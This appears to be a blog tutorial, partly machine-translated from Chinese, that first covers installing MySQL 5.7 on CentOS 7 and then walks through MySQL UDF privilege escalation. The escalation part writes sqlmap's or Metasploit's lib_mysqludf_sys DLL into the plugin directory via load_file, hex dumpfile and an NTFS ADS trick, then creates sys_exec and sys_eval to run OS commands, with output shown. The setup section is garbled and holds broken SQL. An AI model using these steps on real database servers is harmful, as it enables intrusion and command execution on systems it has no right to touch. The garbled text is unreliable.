Mysql installation
For example to Centos 7
- wget to download the installation package
wget http://repo.mysql.com/mysql57-community-release-el7-10.noarch.rpm
- Installing the software source
rpm -Uvh mysql57-community-release-el7-10.noarch.rpm
- Install mysql server
yum install -y mysql-community-server
- Start mysql
service mysqld start
- View mysql running state
service mysqld status
As shown, the successful launch
- Modify the temporary password mysql
- For added security, MySQL5.7 randomly generate a password for the root user, in the
error logmiddle, with regard toerror logthe location, if the installation of RPM packages, the default is/var/log/mysqld.loggrep 'temporary password' mysql start after /var/log/mysqld.log // View Temporary Password
- Log in and change the default password
mysql -u root -p // root user login MySQL
ALTER User 'the root' @ 'localhost' the IDENTIFIED BY 'NewPassword';
1819 execute two statements given, two global parameter modification
SET Global validate_password_policy = 0;
SET = Global validate_password_length. 1 ;
MYSQL use udfprivilege escalation
Mention the right idea:
- The
udffile in the specified location (mysql版本 > 5.1,udf.dllexported to a pathMySQLLibPlugin,mysql版本 < 5.1,udf.dllfilewin server 2003decentralized placedc:windowssystem32directory, thewin server 2000left under thec:winntsystem32directory)- Introducing custom function from udf (user defined function) file (
linuxexport environmentlib_mysqludf_sys.so,Windowsthe exportdllfile)- Perform a custom function
Mention the right steps
Check mysql version and
pluginfile locationmysql> status
detected drone version 5.5> 5.1, starting from MySQL 5.0.67, the file must be in the plugin directory. The directory system variable depending on the value plugin_dir. If plugin_dir is empty, i.e. before referring 5.0.67 search directory file it must be located in the dynamic linker system.
The use of
select @@plugin_dirglobal variables QuerypluginFolder
- Find
udf.dllfiles
SQLMAP provides a ready udf.dll, located insqlmap/udf/mysql/windowsthe directory, since MySQL median was 32, so this selection of 32-bit dll file
due sqlmap comes with the shell as well as some binary files, in order to prevent manslaughter have been different or encoded, can not be directly used, it may be utilized sqlmap own decoding toolscloak.py, intosqlmapextracloakcloakthe directory, execute the command generating dll file:cloak.py -d -i E:sqlmapsqlmapproject-sqlmap-4cd8590udfmysqlwindows32lib_mysqludf_sys.dll_
同时MSF也提供了现成的 udf.dll 文件,文件位置
1 |
/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.dll |
- 将
udf.dll文件写入数据库
- 方法一:远程加载
load_file() 函数支持远程加载,配合 dumpfile 实现写入
lib 目录下一定要有 plugin 文件夹 否则报错
使用NTFS ADS流创建 plugin,lib 文件夹,大佬的代码但是我没有成功。。你们可以尝试一下
1 |
select 'It is dll' into dumpfile 'D:\phpStudy\MySQL\lib::$INDEX_ALLOCATION'; //使用NTFS ADS流创建lib目录 |
- 方法二:HEX 写入
在某些情况下我们可以将我们 udf.dll 转化成16进制然后写入,这样就不用连接外网了1
select hex(load_file('E:\sqlmap\sqlmapproject-sqlmap-4cd8590\udf\mysql\windows\32\lib_mysqludf_sys.dll')) into outfile "E:\udf32.hex";
生成了 hex 文件以后我们可以将 hex 文件的内容复制出来,写入我们的命令,16进制代码前记得加0x表示16进制
1 |
select 0x4D5A9000030000000…(太长省略) into dumpfile "D:\phpStudy\MySQL\lib\plugin\udf.dll"; |
依旧需要plugin文件存在,这里我手动创建了一个毕竟那个NFTS ADS流创建我没创建成功
- dll 文件利用
sqlmap中的 udf 文件提供的函数:1
2
3
4sys_eval,执行任意命令,并将输出返回。
sys_exec,执行任意命令,并将退出码返回。
sys_get,获取一个环境变量。
大专栏 Mysql 提权(UDF提权)line">sys_set,创建或修改一个环境变量。
加载函数
sys_exec函数1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18mysql> create function sys_exec RETURNS int soname 'udf.dll' ;
Query OK, 0 rows affected (0.01 sec)
mysql> select * from mysql.func where name = "sys_exec";
+----------+-----+---------+----------+
| name | ret | dl | type |
+----------+-----+---------+----------+
| sys_exec | 2 | udf.dll | function |
+----------+-----+---------+----------+
1 row in set (0.00 sec)
mysql> select sys_exec('whoami');
+--------------------+
| sys_exec('whoami') |
+--------------------+
| 0 |
+--------------------+
1 row in set (0.20 sec)
函数删除
1 |
mysql> drop function sys_exec; |
- sys_evel() 函数(该功能将执行系统命令并在屏幕上通过标准输出显示)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18mysql> create function sys_eval returns string soname 'udf.dll';
Query OK, 0 rows affected (0.00 sec)
mysql> select * from mysql.func where name = "sys_eval";
+----------+-----+---------+----------+
| name | ret | dl | type |
+----------+-----+---------+----------+
| sys_eval | 0 | udf.dll | function |
+----------+-----+---------+----------+
1 row in set (0.00 sec)
mysql> select sys_eval('whoami');
+-----------------------+
| sys_eval('whoami') |
+-----------------------+
| desktop-jg0a4e7wcute |
+-----------------------+
1 row in set (0.08 sec)
函数删除
1 |
mysql> drop function sys_eval; |
- sys_get() 函数(该函数返回系统变量的值)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18mysql> create function sys_get returns string soname 'udf.dll';
Query OK, 0 rows affected (0.00 sec)
mysql> select * from mysql.func where name = "sys_get";
+---------+-----+---------+----------+
| name | ret | dl | type |
+---------+-----+---------+----------+
| sys_get | 0 | udf.dll | function |
+---------+-----+---------+----------+
1 row in set (0.00 sec)
mysql> select sys_get('COMSPEC');
+-----------------------------+
| sys_get('COMSPEC') |
+-----------------------------+
| C:Windowssystem32cmd.exe |
+-----------------------------+
1 row in set (0.00 sec)
Delete function
1 |
drop function sys_get; |
Reference links:
https://www.cnblogs.com/silentdoer/articles/7258232.html
http://www.mamicode.com/info-detail-2294087.html
https://www.k0rz3n.com/2018/10 / 21 / Mysql% 20% E5 % 9C% A8% E6% B8% 97% E9% 80% 8F% E6% B5% 8B% E8% AF% 95% E4% B8% AD% E7% 9A% 84% E5 % E7 the A9 88%%%% 94 the A8 /
https://blog.csdn.net/qq_26090065/article/details/81515355